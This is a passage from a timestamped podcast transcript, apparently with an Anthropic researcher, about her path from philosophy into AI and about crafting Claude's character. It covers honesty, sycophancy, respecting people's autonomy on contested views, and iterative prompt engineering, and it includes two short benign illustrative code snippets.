02:43:29.740 | And so that was like, what my PhD was on.
02:43:31.900 | It was on a kind of technical area of ethics, which was ethics, where worlds contain infinitely
02:43:37.020 | many people, strangely, a little bit on the less practical end of ethics.
02:43:41.340 | And then I think that one of the tricky things with doing a PhD in ethics is that you're
02:43:45.820 | thinking a lot about like the world, how it could be better problems.
02:43:49.820 | And you're doing like a PhD in philosophy.
02:43:52.940 | And I think when I was doing my PhD, I was kind of like, this is really interesting.
02:43:57.020 | It's probably one of the most fascinating questions I've ever encountered in philosophy.
02:44:00.300 | And I love it.
02:44:02.380 | But I would rather see if I can have an impact on the world and see if I can do good things.
02:44:09.740 | And I think that was around the time that AI was still probably not as widely recognized
02:44:15.660 | as it is now.
02:44:16.940 | That was around 2017, 2018.
02:44:20.060 | I had been following progress, and it seemed like it was becoming kind of a big deal.
02:44:25.180 | And I was basically just happy to get involved and see if I could help because I was like,
02:44:29.180 | well, if you try and do something impactful, if you don't succeed, you tried to do the
02:44:33.500 | impactful thing and you can go be a scholar and feel like you tried.
02:44:39.020 | And if it doesn't work out, it doesn't work out.
02:44:42.460 | And so then I went into AI policy at that point.
02:44:45.340 | And what does AI policy entail?
02:44:47.900 | At the time, this was more thinking about sort of the political impact and the ramifications
02:44:52.860 | of AI, and then I slowly moved into sort of AI evaluation, how we evaluate models, how
02:44:59.500 | they compare with like human outputs, whether people can tell like the difference between
02:45:03.660 | AI and human outputs.
02:45:04.700 | And then when I joined Anthropic, I was more interested in doing sort of technical alignment
02:45:10.460 | work and again, just seeing if I could do it and then being like, if I can't, then,
02:45:15.500 | you know, that's fine.
02:45:16.300 | I tried sort of the way I lead life, I think.
02:45:20.860 | Oh, what was that like sort of taking the leap from the philosophy of everything into
02:45:24.380 | the technical?
02:45:24.940 | I think that sometimes people do this thing that I'm like not that keen on where they'll
02:45:30.300 | be like, is this person technical or not?
02:45:32.940 | Like you're either a person who can like code and isn't scared of math or you're not.
02:45:37.580 | And I think I'm maybe just more like, I think a lot of people are actually very capable
02:45:43.020 | of working these kinds of areas if they just like try it.
02:45:46.380 | And so I didn't actually find it like that bad.
02:45:49.980 | In retrospect, I'm sort of glad I wasn't speaking to people who treated it like that.
02:45:53.740 | You know, I've definitely met people who are like, well, you like learned how to code.
02:45:56.540 | And I'm like, well, I'm not like an amazing engineer.
02:45:58.700 | Like I'm surrounded by amazing engineers.
02:46:00.940 | My code's not pretty, but I enjoyed it a lot.
02:46:05.420 | And I think that in many ways, at least in the end, I think I flourished like more in
02:46:08.860 | the technical areas than I would have in the policy areas.
02:46:11.580 | Politics is messy and it's harder to find solutions to problems in the space of politics,
02:46:17.180 | like definitive, clear, provable, beautiful solutions as you can with technical problems.
02:46:25.100 | Yeah.
02:46:25.260 | And I feel like I have kind of like one or two sticks that I hit things with, you know,
02:46:30.140 | and one of them is like arguments and like, you know, so like just trying to work out
02:46:35.020 | what a solution to a problem is and then trying to convince people that that is the solution
02:46:39.820 | and be convinced if I'm wrong.
02:46:41.820 | And the other one is sort of more empiricism.
02:46:44.860 | So like just like finding results, having a hypothesis, testing it.
02:46:47.660 | And I feel like a lot of policy and politics feels like it's layers above that.
02:46:53.900 | Like somehow I don't think if I was just like, I have a solution to all of these problems.
02:46:57.260 | Here it is written down.
02:46:58.620 | If you just want to implement it, that's great.
02:47:00.460 | That feels like not how policy works.
02:47:02.300 | And so I think that's where I probably just like wouldn't have flourished is my guess.
02:47:05.500 | Sorry to go in that direction, but I think it would be pretty inspiring for people
02:47:10.060 | that are "non-technical" to see, like, the incredible journey you've been on.
02:47:15.980 | So what advice would you give to people that are sort of maybe just a lot of people think
02:47:22.300 | they're underqualified, insufficiently technical to help in AI?
02:47:27.100 | Yeah, I think it depends on what they want to do.
02:47:30.220 | And in many ways, it's a little bit strange where I've, I thought it's kind of funny that
02:47:35.260 | I think I ramped up technically at a time when now I look at it and I'm like models
02:47:41.820 | are so good at assisting people with this stuff that it's probably like easier now than
02:47:47.500 | like when I was working on this.
02:47:48.700 | So part of me is like, I don't know, find a project and see if you can actually just
02:47:55.500 | carry it out is probably my best advice.
02:47:58.220 | I don't know if that's just because I'm very project based in my learning.
02:48:02.780 | Like, I don't think I learned very well from like, say courses or even from like books,
02:48:08.300 | at least when it comes to this kind of work.
02:48:09.820 | The thing I'll often try and do is just like have projects that I'm working on and implement
02:48:14.220 | them.
02:48:14.860 | And, you know, and this can include like really small, silly things.
02:48:18.220 | Like if I get slightly addicted to like word games or number games or something, I would
02:48:22.860 | just like code up a solution to them because there's some part of my brain and it just
02:48:26.380 | like completely eradicated the itch.
02:48:28.220 | You know, you're like, once you have like solved it and like you just have like a solution
02:48:31.740 | that works every time, I would then be like, cool, I can never play that game again.
02:48:34.940 | That's awesome.
02:48:35.500 | Yeah.
02:48:36.700 | There's a real joy to building like game playing engines, like board games, especially.
02:48:42.860 | Yeah.
02:48:43.180 | So pretty quick, pretty simple, especially a dumb one.
02:48:46.460 | And it's, and then you can play with it.
02:48:48.300 | Yeah.
02:48:49.020 | And then it's also just like trying things like part of me is like, if you, maybe it's
02:48:52.540 | that attitude that I like, as a whole: figure out what seems to be like the way that you
02:48:59.260 | could have a positive impact and then try it.
02:49:01.100 | And if you fail and you, in a way that you're like, I actually like can never succeed at
02:49:05.740 | this.
02:49:06.060 | You like know that you tried and then you go into something else and you probably learn
02:49:09.100 | a lot.
02:49:09.420 | So one of the things that you're an expert in and you do is creating and crafting Claude's
02:49:17.180 | character and personality.
02:49:18.300 | And I was told that you have probably talked to Claude more than anybody else at Anthropic,
02:49:23.900 | like literal conversations.
02:49:25.740 | I guess there's like a Slack channel where the legend goes, you just talk to it nonstop.
02:49:31.660 | So what's the goal of creating and crafting Claude's character and personality?
02:49:36.540 | It's also funny if people think that about the Slack channel, because I'm like, that's
02:49:39.900 | one of like five or six different methods that I have for talking with Claude.
02:49:43.820 | And I'm like, yes, that's a tiny percentage of how much I talk with Claude.
02:49:51.180 | I think the goal, like one thing I really like about the character work is from the
02:49:56.300 | outset, it was seen as an alignment piece of work and not something like a product consideration,
02:50:03.900 | which isn't to say I don't think it makes Claude.
02:50:07.900 | I think it actually does make Claude like enjoyable to talk with.
02:50:11.900 | At least I hope so.
02:50:14.220 | But I guess like my main thought with it has always been trying to get Claude to behave
02:50:21.100 | the way you would kind of ideally want anyone to behave if they were in Claude's position.
02:50:25.500 | So imagine that I take someone and they know that they're going to be talking with potentially
02:50:31.260 | millions of people so that what they're saying can have a huge impact.
02:50:34.380 | And you want them to behave well in this like really rich sense.
02:50:40.540 | So I think that doesn't just mean like being say ethical, though it does include that and
02:50:48.060 | not being harmful, but also being kind of nuanced, you know, like thinking through
02:50:51.580 | what a person means, trying to be charitable with them and being a good conversationalist,
02:50:57.100 | like really in this kind of like rich sort of Aristotelian notion of what it is to be
02:51:01.100 | a good person, and not in this kind of like thin sense; like, ethics as a more comprehensive
02:51:05.420 | notion of what it is to be good.
02:51:06.780 | So that includes things like when should you be humorous?
02:51:08.700 | When should you be caring?
02:51:10.140 | How much should you like respect autonomy and people's like ability to form opinions
02:51:15.980 | themselves?
02:51:16.460 | And how should you do that?
02:51:18.380 | And I think that's the kind of like rich sense of character that I wanted to and still do
02:51:24.700 | want Claude to have.
02:51:25.820 | You also have to figure out when Claude should push back on an idea or argue versus.
02:51:31.500 | So you have to respect the worldview of the person that arrives to Claude, but also maybe
02:51:38.940 | help them grow if needed.
02:51:40.860 | That's a tricky balance.
02:51:42.620 | Yeah.
02:51:43.420 | There's this problem of like sycophancy in language models.
02:51:47.020 | Can you describe that?
02:51:48.140 | Yeah.
02:51:48.380 | So basically there's a concern that the model sort of wants to tell you what you want to
02:51:53.420 | hear, basically.
02:51:54.220 | And you see this sometimes.
02:51:56.300 | So I feel like if you interact with the models, so I might be like, what are three baseball
02:52:02.700 | teams in this region?
02:52:04.540 | And then Claude says, you know, baseball team one, baseball team two, baseball team three.
02:52:10.140 | And then I say something like, oh, I think baseball team three moved, didn't they?
02:52:14.300 | I don't think they're there anymore.
02:52:15.500 | And there's a sense in which like if Claude is really confident that that's not true,
02:52:19.340 | Claude should be like, I don't think so.
02:52:21.660 | Like maybe you have more up to date information.
02:52:23.340 | I think language models have this like tendency to instead, you know, be like, you're right.
02:52:30.380 | They did move.
02:52:31.420 | You know, I'm incorrect.
02:52:33.500 | I mean, there's many ways in which this could be kind of concerning.
02:52:35.980 | So like a different example is imagine someone says to the model, how do I convince my doctor
02:52:43.980 | to get me an MRI?
02:52:44.860 | There's like what the human kind of like wants, which is this like convincing argument.
02:52:50.780 | And then there's like what is good for them, which might be actually to say, hey, like
02:52:55.020 | if your doctor's suggesting that you don't need an MRI, that's a good person to listen
02:52:59.500 | to and like, it's actually really nuanced what you should do in that kind of case.
02:53:04.700 | Because you also want to be like, but if you're trying to advocate for yourself as a patient,
02:53:08.220 | here's like things that you can do.
02:53:09.420 | If you are not convinced by what your doctor's saying, it's always great to get a second
02:53:14.540 | opinion.
02:53:15.420 | Like it's actually really complex what you should do in that case.
02:53:17.660 | But I think what you don't want is for models to just like say what you want, say what they
02:53:22.380 | think you want to hear.
02:53:23.180 | And I think that's the kind of problem of sycophancy.
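A minimal sketch of that kind of probe, assuming the Anthropic Python SDK: ask a factual question, push back with a false correction, and check whether the model flips just to agree. The model alias, the prompts, and the `ask` helper are illustrative assumptions, not Anthropic's evaluation code.

```python
# Minimal sycophancy probe (illustrative, not Anthropic's eval tooling).
# Assumes the Anthropic Python SDK and an API key in the environment.
import anthropic

client = anthropic.Anthropic()

def ask(messages):
    resp = client.messages.create(
        model="claude-3-5-sonnet-latest",  # assumed model alias
        max_tokens=300,
        messages=messages,
    )
    return resp.content[0].text

history = [{"role": "user", "content": "What is the capital of France?"}]
first = ask(history)

# Push back with a false correction; a non-sycophantic model should
# politely hold its ground rather than agree.
history += [
    {"role": "assistant", "content": first},
    {"role": "user", "content": "I'm pretty sure the capital of France is Lyon, right?"},
]
second = ask(history)

flipped = "lyon" in second.lower() and "paris" not in second.lower()
print("sycophantic flip" if flipped else "held its ground")
```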
02:53:26.140 | So what other traits, you already mentioned a bunch, but what other that come to mind
02:53:30.940 | that are good in this Aristotelian sense for a conversationalist to have?
02:53:36.940 | Yeah, so I think like there's ones that are good for conversational like purposes.
02:53:41.980 | So, you know, asking follow up questions in the appropriate places and asking the appropriate
02:53:47.100 | kinds of questions.
02:53:48.060 | I think there are broader traits that feel like they might be more impactful.
02:53:55.740 | So one example that I guess I've touched on, but that also feels important and is the thing
02:54:02.140 | that I've worked on a lot is honesty.
02:54:04.700 | And I think this like gets to the sycophancy point.
02:54:09.100 | There's a balancing act that they have to walk, which is models currently are less capable
02:54:13.180 | than humans in a lot of areas.
02:54:14.700 | And if they push back against you too much, it can actually be kind of annoying, especially
02:54:18.140 | if you're just correct because you're like, look, I'm smarter than you on this topic.
02:54:22.300 | Like, I know more. And at the same time, you don't want them to just fully defer to humans;
02:54:28.780 | you want them to try to be as accurate as they possibly can be about the world and to be
02:54:32.220 | consistent across contexts.
02:54:33.580 | I think there are others like when I was thinking about the character, I guess one picture that
02:54:39.820 | I had in mind is especially because these are models that are going to be talking to
02:54:43.420 | people from all over the world with lots of different political views, lots of different
02:54:47.180 | ages, and so you have to ask yourself like, what is it to be a good person in those circumstances?
02:54:53.580 | Is there a kind of person who can like travel the world, talk to many different people and
02:54:58.380 | almost everyone will come away being like, wow, that's a really good person.
02:55:02.860 | That person seems really genuine.
02:55:04.220 | And I guess like my thought there was like, I can imagine such a person and they're not
02:55:09.020 | a person who just like adopts the values of the local culture.
02:55:11.580 | And in fact, that would be kind of rude.
02:55:12.860 | I think if someone came to you and just pretended to have your values, you'd be like, that's
02:55:16.300 | kind of off-putting.
02:55:17.100 | It's someone who's like very genuine and insofar as they have opinions and values,
02:55:22.060 | they express them, they're willing to discuss things though, they're open-minded, they're
02:55:26.300 | respectful.
02:55:27.340 | And so I guess I had in mind that person: if we were to aspire to be the best
02:55:33.260 | person that we could be in the kind of circumstance that a model finds itself in, how would we act?
02:55:37.660 | And I think that's the kind of guide to the sorts of traits that I tend to think
02:55:41.980 | about.
02:55:42.620 | Yeah, that's a beautiful framework.
02:55:44.780 | I want you to think about this like a world traveler.
02:55:47.100 | And while holding onto your opinions, you don't talk down to people, you don't think
02:55:53.820 | you're better than them because you have those opinions, that kind of thing.
02:55:56.860 | You have to be good at listening and understanding their perspective, even if it doesn't match
02:56:02.220 | your own.
02:56:02.780 | So that's a tricky balance to strike.
02:56:04.380 | So how can Claude represent multiple perspectives on a thing?
02:56:08.860 | Like, is that challenging?
02:56:11.660 | We could talk about politics.
02:56:13.100 | It's very divisive, but there are other divisive topics too: baseball teams, sports, and so on.
02:56:19.420 | How is it possible to sort of empathize with a different perspective and to be able to
02:56:24.940 | communicate clearly about the multiple perspectives?
02:56:27.980 | I think that people think about values and opinions as things that people hold sort of
02:56:34.140 | with certainty and almost like preferences of taste or something, like the way that they
02:56:39.820 | would, I don't know, prefer like chocolate to pistachio or something.
02:56:43.260 | But actually, I think about values and opinions as like a lot more like physics than I think
02:56:51.820 | most people do.
02:56:52.540 | I'm just like, these are things that we are openly investigating.
02:56:56.380 | There's some things that we're more confident in.
02:56:58.140 | We can discuss them.
02:56:59.980 | We can learn about them.
02:57:01.100 | And so I think in some ways, ethics is definitely different in nature, but it has
02:57:09.420 | a lot of those same kinds of qualities.
02:57:10.860 | You want models in the same way you want them to understand physics.
02:57:14.380 | You kind of want them to understand all values in the world that people have and to be curious
02:57:19.580 | about them and to be interested in them and to not necessarily like pander to them or
02:57:24.140 | agree with them, because there's just lots of values where I think almost all people
02:57:27.980 | in the world, if they met someone with those values, they'd be like, that's abhorrent.
02:57:31.340 | I completely disagree.
02:57:34.380 | And so again, maybe my thought is, well, in the same way that a person can, like I think
02:57:40.940 | many people are thoughtful enough on issues of like ethics, politics, opinions that even
02:57:46.860 | if you don't agree with them, you feel very heard by them.
02:57:49.820 | They think carefully about your position.
02:57:51.740 | They think about its pros and cons.
02:57:53.180 | They maybe offer counter considerations.
02:57:55.420 | So they're not dismissive, but nor will they agree.
02:57:57.660 | You know, if they're like, actually, I just think that that's very wrong.
02:58:00.220 | They'll say that.
02:58:01.980 | I think that in Claude's position, it's a little bit trickier because you don't necessarily
02:58:07.580 | want to like, if I was in Claude's position, I wouldn't be giving a lot of opinions.
02:58:11.260 | I just wouldn't want to influence people too much.
02:58:12.860 | I'd be like, you know, I forget conversations every time they happen, but I know I'm talking
02:58:17.500 | with like potentially millions of people who might be like really listening to what I say.
02:58:22.700 | I think I would just be like, I'm less inclined to give opinions.
02:58:25.180 | I'm more inclined to like think through things or present the considerations to you or discuss
02:58:31.100 | your views with you, but I'm a little bit less inclined to like affect how you think
02:58:37.100 | because it feels much more important that you maintain like autonomy there.
02:58:41.020 | - Yeah.
02:58:42.300 | Like if you really embody intellectual humility, the desire to speak decreases quickly.
02:58:48.940 | - Yeah.
02:58:49.660 | - Okay.
02:58:50.380 | But Claude has to speak.
02:58:52.540 | So, but without being overbearing.
02:58:58.060 | - Yeah.
02:58:59.020 | - And then, but then there's a line when you're sort of discussing whether the earth is flat
02:59:03.260 | or something like that.
02:59:04.060 | I actually was, I remember a long time ago was speaking to a few high profile folks and
02:59:12.220 | they were so dismissive of the idea that the earth is flat, but like so arrogant about it.
02:59:17.820 | And I thought like, there's a lot of people that believe the earth is flat.
02:59:21.740 | That was, I don't know if that movement is there anymore.
02:59:24.140 | That was like a meme for a while.
02:59:25.340 | - Yeah.
02:59:25.900 | - But they really believed it.
02:59:27.420 | And like, well, okay.
02:59:28.620 | So I think it's really disrespectful to completely mock them.
02:59:32.140 | I think you have to understand where they're coming from.
02:59:35.660 | I think probably where they're coming from is the general skepticism of institutions,
02:59:40.060 | which is grounded in a kind of, there's a deep philosophy there, which you could understand,
02:59:45.820 | you can even agree with in parts.
02:59:48.060 | And then from there, you can use it as an opportunity to talk about physics without
02:59:52.460 | mocking them, without so on, but it's just like, okay, what would the world look like?
02:59:57.020 | What would the physics of the world with the flat earth look like?
02:59:59.740 | There's a few cool videos on this.
03:00:01.260 | - Yeah.
03:00:01.740 | - And then like, is it possible the physics is different?
03:00:05.340 | And what kind of experience would we do?
03:00:06.700 | And just, yeah, without disrespect, without dismissiveness, have that conversation.
03:00:11.180 | Anyway, that to me is a useful thought experiment of like,
03:00:14.460 | how does Claude talk to a flat earth believer and still teach them something,
03:00:21.660 | still grow, help them grow, that kind of stuff.
03:00:24.860 | - Yeah.
03:00:25.100 | - That's challenging.
03:00:26.380 | - And kind of like walking that line between convincing someone and just trying to talk
03:00:32.060 | at them versus drawing out their views, listening and then offering kind of counter considerations.
03:00:38.460 | And it's hard.
03:00:41.020 | I think it's actually a hard line where it's like, where are you trying to convince someone
03:00:44.780 | versus just offering them considerations and things for them to think about
03:00:49.660 | so that you're not actually influencing them, you're just letting them reach wherever they reach.
03:00:54.540 | And that's a line that is difficult, but that's the kind of thing that
03:00:58.060 | language models have to try and do.
03:00:59.340 | - So, like I said, you've had a lot of conversations with Claude.
03:01:03.500 | Can you just map out what those conversations are like?
03:01:06.540 | What are some memorable conversations?
03:01:08.140 | What's the purpose, the goal of those conversations?
03:01:11.340 | - Yeah, I think that most of the time when I'm talking with Claude,
03:01:16.540 | I'm trying to kind of map out its behavior in part.
03:01:21.260 | Obviously I'm getting helpful outputs from the model as well.
03:01:24.860 | But in some ways, this is like how you get to know a system, I think, is by probing it
03:01:29.340 | and then augmenting the message that you're sending and then checking the response to that.
03:01:35.020 | So in some ways, it's like how I map out the model.
03:01:37.980 | I think that people focus a lot on these quantitative evaluations of models.
03:01:44.940 | And this is a thing that I've said before, but I think in the case of language models,
03:01:51.500 | a lot of the time each interaction you have is actually quite high information.
03:01:57.340 | It's very predictive of other interactions that you'll have with the model.
03:02:01.260 | And so I guess I'm like, if you talk with a model hundreds or thousands of times,
03:02:06.300 | this is almost like a huge number of really high quality data points about what the model is like.
03:02:12.140 | In a way that lots of very similar but lower quality conversations just aren't,
03:02:18.460 | or questions that are just mildly augmented and you have thousands of them,
03:02:21.900 | might be less relevant than a hundred really well-selected questions.
03:02:24.940 | Let's see, you're talking to somebody who as a hobby does a podcast.
03:02:29.580 | I agree with you a hundred percent.
03:02:31.020 | If you're able to ask the right questions and are able to hear,
03:02:39.260 | understand the depth and the flaws in the answer, you can get a lot of data from that.
03:02:47.020 | Yeah.
03:02:47.260 | So your task is basically how to probe with questions.
03:02:52.460 | Yeah.
03:02:52.860 | And you're exploring the long tail, the edges, the edge cases,
03:02:56.860 | or are you looking for general behavior?
03:03:00.620 | I think it's almost everything.
03:03:03.820 | Because I want a full map of the model, I'm kind of trying to do
03:03:08.220 | the whole spectrum of possible interactions you could have with it.
03:03:13.420 | So one thing that's interesting about Claude,
03:03:16.060 | and this might actually get to some interesting issues with RLHF,
03:03:19.180 | which is if you ask Claude for a poem, I think that a lot of models, if you ask them for a poem,
03:03:24.380 | the poem is fine. Usually it kind of rhymes. If you say, "Give me a poem about the Sun,"
03:03:30.780 | it'll be a certain length, it'll rhyme, it'll be fairly benign.
03:03:38.060 | And I've wondered before, is it the case that what you're seeing is kind of like the average?
03:03:43.340 | It turns out, if you think about people who have to talk to a lot of people and be very charismatic,
03:03:47.660 | one of the weird things is that I'm like, "Well, they're kind of incentivized to have
03:03:51.180 | these extremely boring views." Because if you have really interesting views, you're divisive.
03:03:56.220 | And a lot of people are not going to like you. So if you have very extreme policy positions,
03:04:02.300 | I think you're just going to be less popular as a politician, for example.
03:04:06.620 | And it might be similar with creative work. If you produce creative work that is just trying
03:04:11.980 | to maximize the number of people that like it, you're probably not going to get as many people
03:04:15.980 | who just absolutely love it, because it's going to be a little bit, you know, you're like, "Oh,
03:04:20.940 | this is... yes, this is decent." And so you can do this thing where I have various prompting
03:04:27.500 | things that I'll do to get Claude to… I'll do a lot of like, "This is your chance to be fully
03:04:33.900 | creative. I want you to just think about this for a long time. And I want you to create a poem about
03:04:39.660 | this topic that is really expressive of you, both in terms of how you think poetry should be
03:04:44.620 | structured, etc." And you just give it this really long prompt. And its poems are just so much
03:04:50.700 | better. They're really good. And I don't think I'm someone who is… I think it got me interested in
03:04:56.860 | poetry, which I think was interesting. I would read these poems and just be like, "I love the
03:05:02.460 | imagery. I love like…" And it's not trivial to get the models to produce work like that. But when
03:05:08.300 | they do, it's really good. So I think that's interesting that just encouraging creativity
03:05:14.060 | and for them to move away from the kind of standard, immediate reaction that might just be
03:05:20.220 | the aggregate of what most people think is fine can actually produce things that, at least to my
03:05:24.700 | mind, are probably a little bit more divisive, but I like them. But I guess a poem is a nice, clean,
03:05:32.060 | um, way to observe creativity. It's just like easy to detect vanilla versus non-vanilla.
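A small, illustrative contrast of the prompting approach just described; the wording is made up, not the exact prompt used.

```python
# Illustrative prompts only. The point is the contrast: the second gives the
# model explicit room to deviate from the "safe average" poem instead of
# defaulting to a short, rhyming, benign one.
PLAIN_PROMPT = "Give me a poem about the sun."

EXPANSIVE_PROMPT = (
    "This is your chance to be fully creative. Take your time and think about "
    "this for a while first. Then write a poem about the sun that is really "
    "expressive of you, both in what you want to say and in how you think "
    "poetry should be structured. Don't default to rhyme or a standard length "
    "unless you decide that serves the poem."
)
```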
03:05:38.780 | Yeah. That's interesting. That's really interesting. So on that topic,
03:05:43.340 | so the way to produce creativity or something special, you mentioned writing prompts. And
03:05:48.220 | I've heard you talk about, I mean, the science and the art of prompt engineering. Could you just
03:05:55.020 | speak to, uh, what it takes to write great prompts?
03:05:59.980 | I really do think that philosophy has been weirdly helpful for me here more than in many other
03:06:07.820 | respects. So in philosophy, what you're trying to do is convey these very hard concepts. One of the
03:06:15.900 | things you are taught is this - and I think it is because it is an anti-bullshit
03:06:21.820 | device in philosophy. Philosophy is an area where you could have people bullshitting and
03:06:26.060 | you don't want that. Um, and so it's like this like desire for like extreme clarity. So it's like
03:06:33.580 | anyone could just pick up your paper, read it and know exactly what you're talking about is why it
03:06:37.580 | can almost be kind of dry. Like all of the terms are defined. Every objection is kind of gone
03:06:42.540 | through methodically. Um, and it makes sense to me because I'm like, when you're in such an
03:06:46.700 | a priori domain, like you just, clarity is sort of a, uh, this way that you can, you know, um,
03:06:54.620 | prevent people from just kind of making stuff up. And I think that's sort of what you have to do
03:07:00.460 | with language models. Like very often I actually find myself doing sort of mini versions of
03:07:04.620 | philosophy, you know? So I'm like, suppose that you give me a task, I have a task for the model
03:07:09.740 | and I want it to like pick out a certain kind of question or identify whether an answer has a
03:07:13.660 | certain property. Like I'll actually sit and be like, let's just give this a name, this property.
03:07:19.340 | So like, you know, suppose I'm trying to tell it like, oh, I want you to identify whether this
03:07:23.500 | response was rude or polite. I'm like, that's a whole philosophical question in and of itself.
03:07:28.140 | So I have to do as much like philosophy as I can in the moment to be like, here's what I mean by
03:07:31.820 | rudeness and here's what I mean by politeness. And then there's a like, there's another element
03:07:36.620 | that's a bit more, um, I guess, I don't know if this is scientific or empirical. I think it's
03:07:43.660 | empirical. So like I take that description and then what I want to do is, is again, probe the
03:07:49.100 | model like many times. Like this is very, prompting is very iterative. Like I think a lot of people
03:07:53.500 | where they're, if a prompt is important, they'll iterate on it hundreds or thousands of times.
03:07:57.180 | And so you give it the instructions and then I'm like, what are the edge cases? So if I looked at
03:08:03.180 | this, so I try and like almost like, you know, see myself from the position of the model and be like,
03:08:09.180 | what is the exact case that I would misunderstand or where I would just be like, I don't know what
03:08:13.180 | to do in this case. And then I give that case to the model and I see how it responds. And if I
03:08:17.500 | think I got it wrong, I add more instructions or even add that in as an example. So these very,
03:08:22.620 | like taking the examples that are right at the edge of what you want and don't want and putting
03:08:26.940 | those into your prompt as like an additional kind of way of describing the thing. Um, and so yeah,
03:08:32.060 | in many ways it just feels like this mix of like, it's really just trying to do clear exposition.
03:08:37.740 | Um, and I think I do that cause that's how I get clear on things myself. So in many ways, like
03:08:43.340 | clear prompting for me is often just me understanding what I want. Um, it's like half
03:08:47.820 | the task. So I guess that's quite challenging. There's like a laziness that overtakes me if I'm
03:08:53.260 | talking to Claude where I hope Claude just figures it out. So for example, I asked Claude for today
03:08:59.980 | to ask some interesting questions. Okay. And for the questions that came up, I think I listed a few
03:09:05.980 | criteria, sort of: interesting, counterintuitive, and/or funny, or something like this. All right. And it
03:09:11.980 | gave me some pretty good, like it was okay. But I think what I'm hearing you say is like, all right,
03:09:17.900 | well, I have to be more rigorous here. I should probably give examples of what I mean by interesting
03:09:22.700 | and what I mean by funny or counterintuitive and iteratively, um, build that prompt to do better
03:09:33.180 | to get to what feels like the right thing. Cause it's really a creative act. I'm not asking
03:09:39.420 | for factual information, I'm asking to write together with Claude. So I almost have to program
03:09:45.020 | using natural language. Yeah. I think that prompting does feel a lot like the kind of
03:09:50.380 | the programming using natural language and experimentation or something. It's an odd blend
03:09:55.420 | of the two. I do think that for most tasks. So if I just want Claude to do a thing, I think that
03:10:00.380 | I am probably more used to knowing how to ask it to avoid like common pitfalls or issues that
03:10:05.580 | it has. I think these are decreasing a lot over time. Um, but it's also very fine to just ask it
03:10:11.980 | for the thing that you want. Um, I think that prompting actually only really becomes relevant
03:10:16.140 | when you're really trying to eke out the top, like 2% of model performance. So for like a lot
03:10:20.620 | of tasks, I might just, you know, if it gives me an initial list back and there's something I don't
03:10:24.220 | like about it, like it's kind of generic, like for that kind of task, I'd probably just take
03:10:28.700 | a bunch of questions that I've had in the past that I've thought worked really well. And I would
03:10:32.940 | just give it to the model and then be like, no, here's this person that I'm talking with.
03:10:36.060 | Give me questions of at least that quality. Um, or I might just ask it for some questions. And then
03:10:43.340 | if I was like, Oh, these are kind of trite or, like, you know, I would just give it that feedback and
03:10:47.420 | then hopefully produces a better list. Um, I think that kind of iterative prompting at that point,
03:10:53.100 | your prompt is like a tool that you're going to get so much value out of that you're willing to
03:10:56.460 | put in the work. Like if I was a company making prompts for models, I'm just like, if you're
03:11:01.020 | willing to spend a lot of like time and resources on the engineering behind like what you're building,
03:11:05.820 | then the prompt is not something that you should be spending like an hour on. It's like, that's a
03:11:10.540 | big part of your system. Make sure it's working really well. And so it's only things like that.
03:11:14.620 | Like if I, if I'm using a prompt to like classify things or to create data, that's when you're like,
03:11:19.340 | it's actually worth just spending like a lot of time, like really thinking it through.
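A minimal sketch of that iterative loop as code rather than description; the 'rude vs. polite' definition, the edge cases, and the prompt format are illustrative assumptions, not a real Anthropic prompt.

```python
# Iterative prompt construction for a classifier-style task (illustrative).
DEFINITION = (
    "A response is 'rude' if it dismisses the person, mocks them, or refuses "
    "a reasonable request without explanation. Blunt but respectful "
    "disagreement does NOT count as rude."
)

# Examples sitting right at the edge of the concept. Each time the prompt
# fails on a case, that case gets promoted into this list (or the definition
# above gets refined), and the prompt is tried again.
EDGE_CASES = [
    ("I'm not going to answer that, it's a silly question.", "rude"),
    ("I disagree, and here's why, though I see where you're coming from.", "polite"),
]

def build_classifier_prompt(response_text: str) -> str:
    examples = "\n".join(f"Response: {r}\nLabel: {label}" for r, label in EDGE_CASES)
    return (
        f"{DEFINITION}\n\n"
        f"Here are borderline examples and their labels:\n{examples}\n\n"
        "Now label the following response as 'rude' or 'polite', answering "
        f"with one word.\nResponse: {response_text}\nLabel:"
    )

# The built prompt is what gets sent to the model on each iteration.
print(build_classifier_prompt("No. Figure it out yourself."))
```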
03:11:22.620 | What other advice would you give to people that are talking to Claude sort of generally more
03:11:29.020 | general? Cause right now we're talking about maybe the edge cases, like eking out the 2%,
03:11:32.140 | but what in general advice would you give when they show up to Claude trying it for the first
03:11:38.060 | time? You know, there's a concern that people over-anthropomorphize models. And I think that's
03:11:41.740 | like a very valid concern. I also think that people often under-anthropomorphize them because
03:11:46.940 | sometimes when I see like issues that people have run into with Claude, you know, say Claude is
03:11:51.100 | like refusing a task that it shouldn't refuse. But then I look at the text and like the specific
03:11:56.460 | wording of what they wrote. And I'm like, I see why Claude did that. And I'm like, if you think
03:12:03.820 | through how that looks to Claude, you probably could have just written it in a way that wouldn't
03:12:07.580 | evoke such a response. Especially this is more relevant if you see failures or if you see issues,
03:12:13.340 | it's sort of like, think about what the model failed at, like why, what did it do wrong?
03:12:18.060 | And then maybe that will give you a sense of like why. So is it the way that I phrased the thing?
03:12:24.860 | And obviously like as models get smarter, you're going to need less of this. And I already see
03:12:29.820 | like people needing less of it. But that's probably the advice is sort of like try to
03:12:34.460 | have sort of empathy for the model. Like read what you wrote as if you were like a kind of like
03:12:39.260 | person just encountering this for the first time. How does it look to you? And what would have made
03:12:43.660 | you behave in the way that the model behaved? So if it misunderstood what kind of like,
03:12:47.340 | what coding language you wanted to use, is that because like it was just very ambiguous and it
03:12:51.260 | kind of had to take a guess, in which case next time you could just be like, hey, make sure this
03:12:55.020 | is in Python or, I mean, that's the kind of mistake I think models are much less likely to
03:12:58.620 | make now. But if you do see that kind of mistake, that's probably the advice I'd have.
03:13:03.660 | And maybe sort of, I guess, ask questions why or what other details can I provide to help you
03:13:11.420 | answer better? Does that work or no? Yeah. I mean, I've done this with the models,
03:13:15.820 | like it doesn't always work, but like sometimes I'll just be like, why did you do that?
03:13:20.620 | I mean, people underestimate the degree to which you can really interact with models.
03:13:25.420 | Like, yeah, sometimes I'll just quote word for word the part that made you do that,
03:13:31.580 | and you don't know that it's like fully accurate, but sometimes you do that and then you change a
03:13:35.260 | thing. I mean, I also use the models to help me with all of this stuff. I should say like
03:13:38.780 | prompting can end up being a little factory where you're actually building prompts to generate
03:13:43.180 | prompts. And so like, yeah, anything where you're like having an issue, asking for suggestions,
03:13:50.620 | sometimes just do that. Like you made that error. What could I have said? That's actually not
03:13:54.780 | uncommon for me to do. What could I have said that would make you not make that error? Write
03:13:58.620 | that out as an instruction. And I'm going to give it to the model. I'm going to try it. Sometimes I do
